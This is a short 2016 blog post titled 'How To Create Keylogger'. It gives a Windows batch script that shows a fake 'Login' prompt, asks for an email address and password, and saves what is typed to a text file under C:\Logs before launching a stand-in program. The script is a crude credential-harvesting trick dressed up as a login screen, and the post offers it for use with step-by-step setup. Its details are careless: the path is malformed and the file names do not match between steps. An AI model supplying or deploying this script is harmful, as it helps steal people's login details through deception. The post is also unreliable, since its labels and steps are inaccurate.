Saturday, December 10, 2016

How To Create Keylogger

Step 1. First of all, you need to open notepad in your windows by pressing Window button and then selecting the notepad from the optionsNow in notepad copy and paste the below code in it.
@echo off
color a
title Login
cls
echo Please Enter Your Email Address And Password
echo.
echo.
cd “C:Logs”
set /p user=Username:
set /p pass=Password:
echo Username=”%user%” Password=”%pass%” >> Log.txt
start >>Program Here<<
exit

Creating Keylogger With Notepad
Creating Keylogger With Notepad
Step 2. Now save this file as Logs.bat on your desktop.

Creating Keylogger With Notepad
Creating Keylogger With Notepad
Step 3. Now create a new folder named logs. (Note that keylogger will only work if the folder name is logs). Cut the folder and paste it into drive C

Creating Keylogger With Notepad
Creating Keylogger With Notepad
Step 4. Now test your file Log.bat and then after entering the Username and password

Creating Keylogger With Notepad
Creating Keylogger With Notepad
Step 5. Open the folder in C drive and see all saved key logs there as a text file created there automatically.
Creating Keylogger With Notepad

No comments:

Post a Comment